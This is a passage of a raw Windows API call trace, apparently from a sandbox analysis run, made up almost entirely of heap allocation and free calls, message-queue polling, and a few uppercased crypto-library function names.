Size=0x8) returned 0x2e54ee8 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2ea9980 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0248.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2ebecb0 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9980 | out: hHeap=0x970000) returned 1 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.520] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0248.520] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.520] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0248.520] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0248.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0248.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0248.521] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0248.521] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0248.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0248.521] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0248.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0248.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0248.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0248.522] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.522] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0248.523] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0248.523] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0248.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2ea9980 [0248.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2ed3fe0 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9980 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2ea9980 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed3fe0 | out: hHeap=0x970000) returned 1 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2ed3fe0 [0248.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9980 | out: hHeap=0x970000) returned 1 [0248.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0248.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94650 | out: hHeap=0x970000) returned 1 [0248.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0248.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0248.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0248.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0248.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebecb0 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29340 | out: hHeap=0x970000) returned 1 [0248.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15328) returned 0x2f14010 [0248.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed3fe0 | out: hHeap=0x970000) returned 1 [0248.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0248.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0248.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0248.629] RtlAllocateHeap 